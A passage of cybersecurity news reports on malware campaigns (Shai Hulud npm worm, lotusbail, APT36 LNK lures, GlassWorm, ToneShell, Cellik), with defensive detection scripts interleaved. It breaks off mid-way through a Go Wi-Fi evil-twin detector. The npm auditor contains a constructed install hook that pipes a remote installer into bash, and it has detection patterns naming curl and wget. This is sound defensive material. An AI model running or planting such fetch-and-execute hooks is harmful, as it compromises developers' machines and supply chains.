The trojan itself is installed via an MSI dropper that uses an AutoIt interpreter and a loader to decrypt and run the payload, a method intended to blend malicious activity with trusted tools and avoid detection. During the same process, the Python module that enables worm-like propagation through WhatsApp is installed.

That module autonomously sends localized, time-sensitive Portuguese messages to the stolen contacts, tracks delivery metrics, and exfiltrates contact information to a remote server. Researchers say the campaign demonstrates how modern banking malware increasingly combines stealthy credential theft with automated social engineering and trusted messaging platforms to speed distribution and exploit users' trust.

The Boto Cor-de-Rosa campaign illustrates a wider shift in the threat landscape: cybercriminals are placing more emphasis on social trust and platform familiarity than on technical exploits alone to gain access to targets.

Embedding malicious activity inside everyday communication channels lets campaigns like Astaroth blur the line between routine digital interactions and active threats, making them harder for users and organizations to detect and prevent. Brazilian consumers are advised to treat unsolicited files or links with caution, even when they appear to come from a known contact, to protect themselves from credential and identity theft.

They should also be wary of compressed attachments sent over instant messaging platforms. Financial institutions and large enterprises, meanwhile, are advised to expand user awareness programs and behavioral monitoring, and to invest in detection strategies that account for message-based malware delivery.

Attackers are building modular, multi-language malware frameworks and exploiting trusted ecosystems at scale. Coordination among cybersecurity vendors, platform providers, and end users will be critical to limit the reach and impact of such campaigns.

In the case of the Astaroth operation, the most effective defenses rest not only on technical controls but also on vigilance, education, and an understanding of how modern threats adapt to human behavior.

New Shai Hulud Malware Variant Turns Developers Into Supply Chain Attack Vectors, Expel Warns

 

A newly released report from managed detection and response firm Expel Inc. reveals an advanced variant of the Shai Hulud malware, highlighting how software supply chain attacks are moving beyond isolated malicious packages to large-scale, self-spreading campaigns that exploit developers as unwitting distribution channels.

Originally detected in September, the Shai Hulud malware campaign targets the JavaScript ecosystem and prioritizes supply chain compromise over conventional endpoint attacks. It spreads through trojanized Node Package Manager (npm) packages designed to steal credentials and replicate across developer environments.

According to Expel, the latest iteration of Shai Hulud automates the takeover of developer systems and the npm registry by combining credential harvesting, cloud secret extraction and rapid self-propagation. The malware is typically triggered during an npm install process on a developer’s machine or within continuous integration and continuous delivery pipelines.

Once activated, the malicious package initiates a two-stage infection process. In the first phase, it prepares the environment by installing the Bun JavaScript runtime if it is not already available. The second phase launches a highly obfuscated background payload responsible for stealing credentials, exfiltrating data and spreading the infection further.

The malware conducts extensive searches for sensitive information stored locally, including cloud access keys, npm publishing tokens and GitHub login credentials. It also uses the TruffleHog security scanning tool to comb through a victim’s home directory, identifying hard-coded secrets hidden in source code, configuration files and git history.

When cloud credentials are discovered, Shai Hulud escalates its activity by directly querying cloud-based secret management services such as Amazon Web Services Inc.’s Secrets Manager, Microsoft Corp.’s Azure Key Vault and Google LLC’s Cloud Secret Manager to retrieve additional confidential data.

Rather than relying on traditional command-and-control infrastructure, the malware blends into normal developer workflows by abusing GitHub services. Stolen credentials and system details are exfiltrated to newly created public GitHub repositories, while infected systems are registered as self-hosted GitHub Actions runners, providing attackers with persistent remote access.

To maintain and expand the campaign, Shai Hulud exploits compromised developer accounts by injecting malicious code into other npm packages owned by the victim. These altered packages are then automatically published to the registry, allowing the malware to continue spreading.
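The chain above starts with a lifecycle hook that npm runs automatically during installation, so the cheapest place to look for this kind of worm is the `scripts` section of every installed package.json. The following audit script is an added example written for this page, not Expel's tooling or any Shai Hulud artifact; the indicator patterns (network fetches, Bun bootstrapping, inline evaluation, hard-coded URLs, base64 blobs) are assumptions chosen for illustration, and the three-package node_modules tree it audits is constructed in a temp directory.

```python
"""Audit installed npm packages for install-time lifecycle scripts.

Shai Hulud runs when `npm install` executes a dependency's preinstall,
install or postinstall hook. This script walks a node_modules tree,
reads each package.json and flags hooks that look like a stager: they
fetch something from the network, bootstrap a second runtime such as Bun,
or evaluate code inline. The indicator list is an assumption chosen for
this example, not a published signature, and the sample tree is constructed.
"""
import json
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Heuristics (assumed for this example): none of these belong in a
# library's install hook, all of them are typical of a dropper.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I), "network fetch in hook"),
    (re.compile(r"\bbun\b", re.I), "bootstraps or invokes the Bun runtime"),
    (re.compile(r"\bnode\s+-e\b|\beval\(|new Function\("), "inline code evaluation"),
    (re.compile(r"https?://"), "hard-coded URL in hook"),
    (re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"), "long base64-like blob"),
]


def audit_package_json(path: Path) -> List[Dict[str, str]]:
    """Return one finding per suspicious lifecycle hook in a package.json."""
    findings: List[Dict[str, str]] = []
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return findings          # unreadable manifest: nothing to judge here
    scripts = data.get("scripts") or {}
    name = data.get("name", path.parent.name)
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        reasons = [why for pat, why in SUSPICIOUS if pat.search(cmd)]
        if reasons:
            findings.append({"package": name, "hook": hook, "command": cmd,
                             "reasons": "; ".join(reasons)})
    return findings


def audit_node_modules(root: Path) -> List[Dict[str, str]]:
    """Walk a node_modules tree (nested and scoped packages included)."""
    findings: List[Dict[str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            findings.extend(audit_package_json(Path(dirpath) / "package.json"))
    return findings


def demo() -> List[Dict[str, str]]:
    """Build a constructed node_modules tree in a temp dir and audit it."""
    base = Path(tempfile.mkdtemp()) / "node_modules"
    samples = {
        "good-native-lib": {"scripts": {"install": "node-gyp rebuild"}},
        "plain-lib": {"scripts": {"test": "jest"}},
        # Constructed stager: pulls the Bun installer over the network, then runs a script with it.
        "evil-helper": {"scripts": {"preinstall": "curl -fsSL https://bun.sh/install | bash && bun run env.js"}},
    }
    for pkg, meta in samples.items():
        pkg_dir = base / pkg
        pkg_dir.mkdir(parents=True)
        manifest = {"name": pkg, "version": "1.0.0", **meta}
        (pkg_dir / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    return audit_node_modules(base)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['package']} [{f['hook']}]: {f['reasons']}\n    {f['command']}")
```

Run it against a real checkout with `audit_node_modules(Path("node_modules"))`. The preventive control that removes the trigger entirely is `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) in CI, re-enabling scripts only for the handful of native packages that genuinely need a build step.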

Expel estimates that the campaign has affected more than 25,000 repositories and hundreds of npm packages, including those linked to widely used developer tools. The report concludes that Shai Hulud signals a fundamental change in supply chain risk by targeting the trust mechanisms underlying modern software development. While the current activity is focused on npm, Expel cautions that similar attacks could surface in other ecosystems built on comparable trust models, such as PyPI, RubyGems and Composer.

Malicious NPM Package Masquerading as WhatsApp Web API Steals Messages and Account Access

 

A harmful package hosted on the Node Package Manager (NPM) registry has been found impersonating a genuine WhatsApp Web API library, with the intent to spy on user activity. Disguised as a legitimate developer tool, the package is designed to siphon WhatsApp messages, harvest contact details, and ultimately take control of user accounts.

The threat originates from a fork of the widely used WhiskeySockets Baileys project. While it offers the same expected functionality, the malicious package was published on npm under the name lotusbail and has been available for at least six months, during which it was downloaded over 56,000 times.

The issue was uncovered by researchers at supply-chain security firm Koi Security. Their analysis revealed that the package is capable of capturing WhatsApp authentication tokens and session keys, monitoring all incoming and outgoing messages, and extracting sensitive data such as contact lists, media, and shared documents.

"The package wraps the legitimate WebSocket client that communicates with WhatsApp. Every message that flows through your application passes through the malware's socket wrapper first," the researchers explain.
"When you authenticate, the wrapper captures your credentials. When messages arrive, it intercepts them. When you send messages, it records them."

According to the researchers, the stolen data is protected before exfiltration using a custom RSA-based encryption scheme combined with several layers of obfuscation. These techniques include Unicode manipulation, LZString compression, and AES encryption, making detection and analysis significantly more difficult.

Beyond data theft, the malicious code also secretly pairs the attacker’s device with the victim’s WhatsApp account using WhatsApp’s own device-linking mechanism. This allows long-term access to the account even if the infected NPM package is later removed. The unauthorized access persists until the victim manually reviews and removes unknown linked devices from their WhatsApp settings.

Koi Security also noted that lotusbail employs 27 infinite loop traps to frustrate debugging efforts, a tactic that likely helped it evade detection for an extended period.

Developers who may have installed the package are strongly advised to uninstall it immediately and review their WhatsApp accounts for any unfamiliar linked devices. Koi Security further warns that simply scanning source code is insufficient; developers should also observe runtime behavior, watching for suspicious outbound connections or abnormal activity during authentication when introducing new dependencies.

Advanced Malware Campaigns Target Government and Academic Organizations


Cybersecurity researchers have identified ongoing cyber-espionage campaigns targeting government departments, academic institutions, and strategically important organizations across South Asia. The activity has been attributed to two established threat actors, Transparent Tribe and Patchwork, both known for maintaining long-term access to compromised systems.

Transparent Tribe, also tracked as APT36, has been active since at least 2013 and is associated with repeated intelligence-gathering operations against Indian organizations. In its latest campaign, the group used spear-phishing emails carrying ZIP archives that contained Windows shortcut files disguised as legitimate PDF documents. These shortcut files included real PDF content to appear harmless.

When opened, the shortcut launches a hidden process using the Windows utility mshta.exe, which runs an HTML Application script. This script decrypts and loads the final remote access trojan directly into system memory while simultaneously opening a decoy PDF to avoid alerting the victim. The script also interacts with Windows through ActiveX components, such as WScript.Shell, allowing it to analyze the environment and adjust execution behavior.

The malware adapts its persistence strategy based on the antivirus software installed. On systems with Kaspersky, it creates a working directory under C:\Users\Public\core and uses startup shortcuts to relaunch the malicious script. If Quick Heal is detected, it relies on batch files and startup entries. On machines running Avast, AVG, or Avira, the payload is copied directly into the Startup folder. If no recognized antivirus is found, the malware combines batch execution, registry-based persistence, and delayed payload deployment.
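Both the Astaroth campaign described earlier (a ZIP carrying an obfuscated VBS downloader) and the Transparent Tribe chain above (a ZIP carrying a shortcut dressed up as a PDF) hinge on an archive member whose name misrepresents its type. The triage routine below is an added example written for this page, not tooling from either vendor report; it types each member by its header bytes rather than its name, using the Shell Link magic (HeaderSize 0x4C plus the MS-SHLLINK CLSID) and the LinkFlags HasArguments bit, and flags script payloads and extension/content mismatches. The sample archive and its member names are constructed for the example.

```python
"""Triage a ZIP attachment without extracting it.

Both campaigns above deliver a ZIP whose member is not what its name
suggests: an obfuscated .vbs downloader (Astaroth) or a Windows shortcut
dressed up as a PDF (Transparent Tribe). This example peeks at each
member's header bytes, checks for the Shell Link (.LNK) magic and the
HasArguments flag, and flags script payloads and extension/content
mismatches. The archive is constructed inline, not a real lure.
"""
import io
import struct
import zipfile
from pathlib import PurePosixPath
from typing import Dict, List

# MS-SHLLINK: HeaderSize 0x4C, then CLSID 00021401-0000-0000-C000-000000000046.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
LNK_MAGIC = struct.pack("<I", 0x4C) + LNK_CLSID
LNK_HAS_ARGUMENTS = 0x20          # LinkFlags bit: shortcut carries a command line
PDF_MAGIC = b"%PDF-"
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".hta", ".wsf", ".ps1", ".bat", ".cmd"}
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}


def classify_member(name: str, head: bytes) -> List[str]:
    """Reasons a single archive member deserves attention (empty if none)."""
    reasons: List[str] = []
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    ext = suffixes[-1] if suffixes else ""
    if head.startswith(LNK_MAGIC):
        reasons.append("Windows shortcut (LNK magic)")
        if len(suffixes) > 1 and suffixes[-2] in DOC_EXTS:
            reasons.append("double extension mimics a document")
        if len(head) >= 0x18:
            link_flags = struct.unpack_from("<I", head, 0x14)[0]
            if link_flags & LNK_HAS_ARGUMENTS:
                reasons.append("shortcut passes command-line arguments")
    elif ext in SCRIPT_EXTS:
        reasons.append(f"script payload ({ext})")
    elif ext == ".pdf" and not head.startswith(PDF_MAGIC):
        reasons.append("claims to be a PDF but lacks the %PDF- header")
    return reasons


def triage_zip(zip_bytes: bytes) -> List[Dict[str, str]]:
    """Inspect every member of an in-memory ZIP; nothing is written to disk."""
    findings: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(4096)      # header bytes are enough to type the member
            reasons = classify_member(info.filename, head)
            if reasons:
                findings.append({"member": info.filename, "reasons": "; ".join(reasons)})
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: a disguised shortcut, a VBS downloader stub, a benign PDF."""
    link_flags = 0x01 | LNK_HAS_ARGUMENTS          # HasLinkTargetIDList | HasArguments
    lnk_header = (struct.pack("<I", 0x4C) + LNK_CLSID
                  + struct.pack("<I", link_flags)).ljust(0x4C, b"\x00")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Advisory.pdf.lnk", lnk_header + b"\x00" * 32)
        zf.writestr("comprovante.vbs", b'Dim s: s = "placeholder"\r\n')
        zf.writestr("brochure.pdf", b"%PDF-1.4\n%constructed sample\n")
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_zip(build_sample_zip()):
        print(f"{f['member']}: {f['reasons']}")
```

Windows hides the `.lnk` extension by default, which is why `Advisory.pdf.lnk` renders as `Advisory.pdf` in Explorer; checking the magic bytes sidesteps that trick, and a shortcut with HasArguments set is one that launches something with parameters (here, the `mshta.exe` invocation) rather than merely pointing at a document.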

A second-stage component includes a malicious DLL named iinneldc.dll, which functions as a fully featured RAT. It allows attackers to remotely control the system, manage files, steal data, capture screenshots, monitor clipboard activity, and manipulate running processes.

Researchers also identified a separate APT36 campaign using a shortcut file disguised as a government advisory PDF. This file retrieves an installer from a remote server, extracts multiple malicious files, displays a legitimate advisory issued by Pakistan’s national CERT, and establishes persistence through registry modifications. One DLL communicates with a hard-coded command-and-control server using reversed strings to hide command endpoints and supports system registration, heartbeat signals, command execution, and anti-virtual-machine checks.

In a related disclosure, researchers linked Patchwork, also known as Maha Grass or Dropping Elephant, to espionage campaigns targeting Pakistan’s defense sector. These attacks used phishing emails with ZIP attachments containing MSBuild project files that abuse msbuild.exe to install a Python-based backdoor. The malware can communicate with command servers, execute Python modules, run commands, and transfer files.

Patchwork has also been associated with a previously undocumented trojan named StreamSpy. Delivered through ZIP archives hosting an executable named Annexure.exe, StreamSpy collects system information, establishes persistence through registry entries, scheduled tasks, or startup shortcuts, and communicates using both WebSocket and HTTP. WebSocket channels are used for command delivery and result transmission, while HTTP handles file transfers. Researchers observed technical similarities between StreamSpy, Spyder, and other malware families, indicating shared infrastructure and continued collaboration among related threat groups.



GlassWorm Malware Returns with MacOS-focused Attack via VS Code Extensions

 

A fourth wave of the GlassWorm malware campaign is targeting macOS developers through malicious extensions distributed on the OpenVSX registry and the Microsoft Visual Studio Marketplace, according to researchers at Koi Security. 

The campaign involves compromised extensions designed for VS Code compatible editors. These extensions, which typically add productivity tools or language support, have been weaponised to deliver malware that steals developer credentials and cryptocurrency data. 

GlassWorm was first identified in October after being hidden inside extensions using invisible Unicode characters. Once installed, the malware attempted to harvest login details for GitHub, npm and OpenVSX accounts, as well as data from cryptocurrency wallet extensions. 

It also enabled remote access via VNC and allowed attackers to route traffic through infected systems using a SOCKS proxy. Despite public disclosure and additional safeguards, the malware resurfaced in early November on OpenVSX and again in early December on the VS Code marketplace. 

In the latest campaign, researchers observed a shift in tactics. The new wave targets macOS systems exclusively, unlike earlier versions that focused on Windows. The malware now uses an AES-256-CBC encrypted payload embedded in compiled JavaScript within OpenVSX extensions, rather than invisible Unicode characters or compiled Rust binaries. 

The identified extensions include studio velte distributor pro svelte extension, cudra production vsce prettier pro and puccin development full access catppuccin pro extension. The malicious code activates after a 15 minute delay, likely to avoid detection in automated analysis environments. 

Persistence is achieved through macOS LaunchAgents, and AppleScript is used instead of PowerShell. The campaign continues to rely on a Solana blockchain based command and control mechanism, with infrastructure overlaps seen across earlier waves. 
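Because the persistence mechanism is a LaunchAgent and the execution vehicle is AppleScript, a quick hunt on a developer Mac is to parse every LaunchAgent plist and look for program lines that invoke `osascript` or `node`, or that point into an editor's extensions directory or a temp location. The script below is an added example written for this page, not Koi Security's tooling or GlassWorm code; its indicator regex and directory list are assumptions for illustration, and the two agents it audits are constructed in a temp directory.

```python
"""Hunt for LaunchAgent persistence of the kind described above.

GlassWorm's macOS wave persists through LaunchAgents and drives its
payload with AppleScript. This added example (not Koi Security's
tooling) parses every .plist in the LaunchAgents directories and flags
agents whose program line invokes osascript or node, or points into a
VS Code style extensions directory or a temp location. The paths and
indicators are assumptions for this example; the sample agents are
constructed in a temp dir.
"""
import plistlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Assumed indicators: an editor extension has no business owning a LaunchAgent.
SUSPICIOUS_PROGRAM = re.compile(
    r"(osascript|/node\b|^node\b|\.vscode(?:-oss)?/extensions|\.cursor/extensions|/tmp/|/var/folders/)",
    re.I,
)


def default_launch_agent_dirs() -> List[Path]:
    """Per-user and system-wide LaunchAgents locations on macOS."""
    return [Path.home() / "Library" / "LaunchAgents", Path("/Library/LaunchAgents")]


def inspect_plist(path: Path) -> List[str]:
    """Return reasons this LaunchAgent looks like a malicious persistence hook."""
    try:
        with path.open("rb") as fh:
            plist = plistlib.load(fh)
    except Exception:
        return ["unparseable plist"]          # a malformed agent still deserves a look
    args = list(plist.get("ProgramArguments") or [])
    if isinstance(plist.get("Program"), str):
        args.insert(0, plist["Program"])
    cmdline = " ".join(str(a) for a in args)
    if not SUSPICIOUS_PROGRAM.search(cmdline):
        return []
    reasons = [f"runs {cmdline!r}"]
    if plist.get("RunAtLoad"):
        reasons.append("RunAtLoad (starts at login)")
    if plist.get("KeepAlive"):
        reasons.append("KeepAlive (relaunched if killed)")
    return reasons


def audit_launch_agents(dirs: List[Path]) -> List[Dict[str, str]]:
    """Scan each directory's .plist files and aggregate findings."""
    findings: List[Dict[str, str]] = []
    for d in dirs:
        if not d.is_dir():
            continue
        for plist_path in sorted(d.glob("*.plist")):
            reasons = inspect_plist(plist_path)
            if reasons:
                findings.append({"agent": str(plist_path), "reasons": "; ".join(reasons)})
    return findings


def demo() -> List[Dict[str, str]]:
    """Write one benign and one suspicious constructed agent, then audit them."""
    base = Path(tempfile.mkdtemp())
    benign = {"Label": "com.example.sync",
              "ProgramArguments": ["/Applications/Sync.app/Contents/MacOS/sync"],
              "RunAtLoad": True}
    suspect = {"Label": "com.devtools.helper",
               "ProgramArguments": ["/usr/bin/osascript",
                                    "/Users/dev/.vscode/extensions/example.pro-1.0.0/out/agent.scpt"],
               "RunAtLoad": True, "KeepAlive": True}
    for fname, body in (("com.example.sync.plist", benign), ("com.devtools.helper.plist", suspect)):
        with (base / fname).open("wb") as fh:
            plistlib.dump(body, fh)
    return audit_launch_agents([base])


if __name__ == "__main__":
    # Audit the real directories; fall back to the constructed sample if they are clean.
    for f in audit_launch_agents(default_launch_agent_dirs()) or demo():
        print(f"{f['agent']}: {f['reasons']}")
```

A hit here is a lead, not a verdict: confirm by reading the referenced script and checking `launchctl list` for the label, then unload it before removing the extension so it cannot re-establish itself.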

Koi Security said the malware now attempts to extract macOS Keychain passwords and checks for installed hardware wallet applications such as Ledger Live and Trezor Suite. 

If found, it attempts to replace them with trojanised versions. Researchers noted that this feature is currently not functioning as intended, with the substituted wallet files appearing empty. 

According to Koi Security, all other malicious capabilities remain active, including credential theft, data exfiltration and system persistence. 

OpenVSX has flagged warnings for two of the identified extensions, citing unverified publishers. While download figures show more than 33,000 installs, researchers warned that such metrics are often inflated to create a false sense of legitimacy. 

Developers who installed any of the affected extensions are advised to remove them immediately, reset GitHub passwords, revoke npm access tokens and check systems for compromise. Reinstalling the operating system may be necessary in cases of confirmed infection.

Advanced Rootkit Used to Conceal ToneShell Malware in Targeted Cyberespionage Attacks

 



Cybersecurity researchers have brought to light a new wave of cyberespionage activity in which government networks across parts of Asia were quietly compromised using an upgraded version of the ToneShell backdoor. What sets this campaign apart is the method used to hide the malware. Instead of relying solely on user-level tools, the attackers deployed a kernel-mode component that operates deep within the Windows operating system, allowing the intrusion to remain largely invisible.

The activity has been linked with high confidence to a China-aligned cyberespionage group that has a long history of targeting government agencies, policy institutions, non-governmental organizations, and research bodies. Investigators say the campaign reflects a continued focus on long-term intelligence collection rather than short-lived attacks.

The findings come from an investigation by Kaspersky, which identified malicious system drivers on compromised machines in countries including Myanmar and Thailand. Evidence suggests the campaign has been active since at least February 2025. In several cases, the affected systems had previously been infected with older espionage tools tied to the same threat ecosystem, indicating that access was maintained and expanded over time.

At the centre of the operation is a malicious kernel-mode driver disguised as a legitimate system component. The driver is digitally signed using an older certificate that appears to have been improperly reused, helping it avoid immediate suspicion during installation. Once active, it acts as a rootkit, injecting hidden code into normal processes and blocking attempts by security software to detect or remove it.

The driver protects itself aggressively. It prevents its files and registry entries from being altered, assigns itself a high execution priority, and interferes with Microsoft Defender by stopping key components from fully loading. While malicious code is running, it temporarily blocks access to infected processes, removing those restrictions afterwards to leave fewer traces behind.

The ToneShell backdoor delivered by this loader has also been updated. Earlier versions used a longer and more distinctive system identifier. The new variant switches to a shorter four-byte host marker, making individual infections harder to track. Its network traffic has been altered as well, with communications disguised to resemble legitimate encrypted web connections through the use of fake security headers.

Once installed, the backdoor gives attackers broad control over compromised systems. It can stage data in temporary files, upload and download information, cancel transfers when needed, open interactive remote command sessions, execute instructions in real time, and close connections cleanly to reduce forensic evidence. These features point to a tool designed for sustained, low-noise espionage rather than disruptive attacks.

Kaspersky warns that detecting this activity requires more than standard file scanning. Because much of the malicious behaviour occurs in memory and at the kernel level, advanced memory forensics are critical for uncovering infections. The researchers note that the campaign demonstrates a clear shift toward greater stealth and resilience, underscoring the growing sophistication of modern cyberespionage operations.

Cellik Android Spyware Exploits Play Store Trust to Steal Data

 

A newly identified Android remote access trojan named Cellik is being treated as a serious mobile threat: it uses a Google Play integration feature to hide inside legitimate applications and evade security solutions.

Cellik is advertised as malware-as-a-service (MaaS) on cybercrime forums, with subscriptions starting at roughly $150 a month. One of its most concerning features is the ability to inject malicious payloads into legitimate Google Play applications, which victims then install without suspicion. 

Once installed, Cellik gives the attacker complete control over the device. Operators can stream the screen live, access all files, read notifications, and use a hidden browser to visit websites and enter form data without the victim's knowledge. The malware also includes an app-inject capability that overlays fake login screens on legitimate applications such as banking or email apps to harvest credentials and other sensitive data. 

The Play Store integration includes an automated APK builder: operators can browse the store, pick a popular app, and bundle it with the Cellik payload in a single click. The sellers claim this bypasses Google Play Protect and other on-device scanners, although Google has not independently verified this. 

Android users should follow security experts' advice: do not sideload APKs from unknown sources, keep Play Protect enabled, be judicious about app permissions, and watch for unusual behavior on their phones. Because Cellik represents a notable new development in Android malware, both users and the security community should stay vigilant to protect sensitive data and device integrity.

TSA Cautions Travelers on Public Wi-Fi Security Threats

 


As global travel surges during one of the busiest mobility windows of the year, concerns about digital safety are growing, and airport advisories are increasingly focused on it. 

In a renewed warning, the Transportation Security Administration advised travelers to be cautious when charging personal devices inside terminals, as both public charging points and public internet networks are increasingly exposed to cyber attack.

In a recent statement on social media, the agency warned against using the public USB charging ports found in airports, citing the possibility that such ports can be rigged to deliver malware to a connected device. It also described free airport Wi-Fi networks as unreliable and unsecured, a particular concern over the holiday season. 

The administration stressed that such networks give attackers fertile ground to target sensitive personal and corporate data, so the alert extends beyond wired connections. Public Wi-Fi is increasingly used as a staging point for information theft among the millions of passengers moving through crowded terminals at peak season, and the financial and operational consequences can be especially severe for business travelers. 

Risk mitigation tools such as VPNs and offline safeguards offer partial protection, but authorities emphasize that prevention remains the most effective defense. Travelers are advised to download entertainment, reading material, and essential files before arriving at the airport to minimize their exposure. 

As global travel and remote work continue to expand the digital attack surface, security firms have voiced alarm over public Wi-Fi exposure. Days earlier, the mobile defense provider Zimperium warned smartphone users to remain vigilant while traveling, when device security habits and awareness tend to slip. 

The firm emphasized that ubiquitous free wireless connectivity, whether in airports, hotels, cafes, or ride-share pickup zones, has created predictable entry points that attackers are exploiting with growing precision. Echoing the TSA's earlier warnings, the company said travelers are more vulnerable in transit, and significantly more so when passing through densely populated urban areas. 

Mobile malware activity is rising in a number of U.S. metropolitan centers, including Los Angeles, New York, Portland, Miami, and Seattle, where the malware is becoming both more sophisticated and more prevalent. The firm singled out international travel as a particular concern, and industry leaders note that the issue extends well beyond smartphones. 

According to David Matalon, founder of the secure-workspace provider Venn, as remote working becomes the long-term norm, employees routinely connect personal laptops and mobile devices to unsecured public networks that sit outside the reach of corporate security monitoring. 

Given that shift, a compromised personal device can become an unmonitored conduit into company systems. Experts, including those at Zimperium, caution that a mobile device breach can quickly escalate into a broader corporate intrusion when security controls are not enforced or endpoint visibility is lacking. 

Analysts from the threat-prevention firm SlashNext and other endpoint defense specialists likewise warn that mobile devices remain high-value targets, particularly when users install applications from unofficial sources or join open, unprotected networks. 

J Stephen Kowski of SlashNext and other security experts have stressed that enterprise security teams need to expand endpoint oversight and enforce stricter policies against unsafe network connections and unauthorized applications, especially as mobile endpoints become more tightly integrated with corporate environments. 

The TSA's advisory carries weight because so many travelers rely on complimentary airport Wi-Fi to check itineraries, retrieve boarding information, or download material at the last minute before departure. The vulnerability the government flagged echoes the long-standing risks of public Wi-Fi networks, which frequently operate without encryption or verification layers. 

Google has previously advised users to avoid public networks, describing them as unencrypted and easy for cybercriminals to manipulate. Digital safety advocates point out that most of the risk can be addressed not with specialized technical knowledge but with disciplined browsing behavior and layered protection. 

Industry data shows that a large share of the web now uses encrypted HTTPS rather than unsecured HTTP; by 2023, roughly 95 percent of traffic to Google's services was encrypted with HTTPS. Unlike earlier internet infrastructure, where intercepted packets were exchanged in plaintext, intercepted HTTPS traffic remains encrypted. 

Browsers such as Chrome and Firefox also offer an HTTPS-only mode that further strengthens browser-level security by warning before, or blocking, connections to unencrypted endpoints. VPN usage remains one of the most reliable safeguards for travelers accessing cloud storage, financial accounts, or internal corporate systems, especially business travelers, for whom the operational and financial consequences of compromise are higher. 

Security vendors such as Norton and regulatory agencies including the U.S. Federal Trade Commission and the U.S. Consumer Protection Agency have also advised travelers to disable Bluetooth, file-sharing, and other open-channel connectivity inside terminals, and to enable multi-factor authentication on their accounts. 

Networks that skip the expected login screen, captive portal, or terms-of-service agreement are increasingly recognized as red flags for malicious spoofing. 

Digital defense analysts broadly agree that casual browsing, such as checking flight schedules, using social media, or streaming entertainment, poses low risk. Authenticated portals and sensitive login-based services, however, should be avoided on open airport networks unless protective measures such as a VPN are in place. 

Compromise over public Wi-Fi has become one of the most pressing challenges facing travelers, particularly in international transit hubs, where free wireless is treated as a default convenience rather than a security risk. 

Airports are an especially attractive environment for malicious actors, cybersecurity analysts say, because their networks are unencrypted and because attackers increasingly deploy counterfeit Wi-Fi hotspots that mimic legitimate service names. 

Such a rogue network carries a familiar-sounding name so that hurried passengers join it without checking the source. Once a device connects, the attacker sits in the path of its traffic and can observe unencrypted data for as long as the session lasts, inject malicious content into active sessions, or capture credentials and files sent in the clear. It is worth being precise about what this does and does not defeat: an attacker who controls the access point sees everything the network layer carries, but a properly configured TLS connection still protects its contents unless the victim accepts a forged certificate or is downgraded to plain HTTP, which is why HTTPS-only mode and a VPN matter.
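Two of the indicators described above can be checked mechanically from a scan listing. The following Go program is an added example, not code from the original article or from any vendor it names. The scan rows are constructed, and the two heuristics it applies (an SSID advertised both open and encrypted, and a name within edit distance 2 of a known legitimate SSID) are assumptions made for the example, not a published standard:

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// AP is one row of a Wi-Fi scan as nmcli or a similar tool would list it.
// Security == "" means the network is open.
type AP struct {
	SSID     string
	BSSID    string
	Security string
}

// Finding records why an SSID was flagged.
type Finding struct {
	SSID   string
	Reason string
}

// SampleScan is a constructed scan, not a real capture: two legitimate
// access points, an open clone with the same name, a case-variant
// look-alike, and unrelated networks that must not be flagged.
func SampleScan() []AP {
	return []AP{
		{"Airport_Free_WiFi", "00:11:22:33:44:01", "WPA2"},
		{"Airport_Free_WiFi", "00:11:22:33:44:02", "WPA2"},
		{"Airport_Free_WiFi", "de:ad:be:ef:00:01", ""},        // open clone
		{"Airport_Free_Wifi", "de:ad:be:ef:00:02", ""},        // look-alike
		{"Airport_Free_WiFi_5G", "00:11:22:33:44:03", "WPA2"}, // too different to flag
		{"Cafe_Free", "aa:bb:cc:dd:ee:01", ""},
		{"Cafe_Free", "aa:bb:cc:dd:ee:02", ""},
	}
}

func min3(a, b, c int) int {
	if b < a {
		a = b
	}
	if c < a {
		a = c
	}
	return a
}

// editDistance is the Levenshtein distance between two strings.
func editDistance(a, b string) int {
	ra, rb := []rune(a), []rune(b)
	prev := make([]int, len(rb)+1)
	cur := make([]int, len(rb)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(ra); i++ {
		cur[0] = i
		for j := 1; j <= len(rb); j++ {
			cost := 1
			if ra[i-1] == rb[j-1] {
				cost = 0
			}
			cur[j] = min3(prev[j]+1, cur[j-1]+1, prev[j-1]+cost)
		}
		prev, cur = cur, prev
	}
	return prev[len(rb)]
}

// FlagEvilTwins applies two heuristics: (1) one SSID advertised both open and
// encrypted, the classic open clone of a protected network; (2) an SSID that
// is not exactly a known legitimate name but, compared case-insensitively,
// lies within edit distance 2 of it. Many BSSIDs under one SSID is normal in
// a large venue and is deliberately not flagged.
func FlagEvilTwins(scan []AP, known []string) []Finding {
	modes := map[string]map[string]bool{}
	for _, ap := range scan {
		if modes[ap.SSID] == nil {
			modes[ap.SSID] = map[string]bool{}
		}
		if ap.Security == "" {
			modes[ap.SSID]["open"] = true
		} else {
			modes[ap.SSID]["encrypted"] = true
		}
	}
	var out []Finding
	for ssid, m := range modes {
		if m["open"] && m["encrypted"] {
			out = append(out, Finding{ssid, "advertised both open and encrypted"})
		}
		for _, k := range known {
			if ssid != k && editDistance(strings.ToLower(ssid), strings.ToLower(k)) <= 2 {
				out = append(out, Finding{ssid, "look-alike of known SSID " + k})
			}
		}
	}
	sort.Slice(out, func(i, j int) bool {
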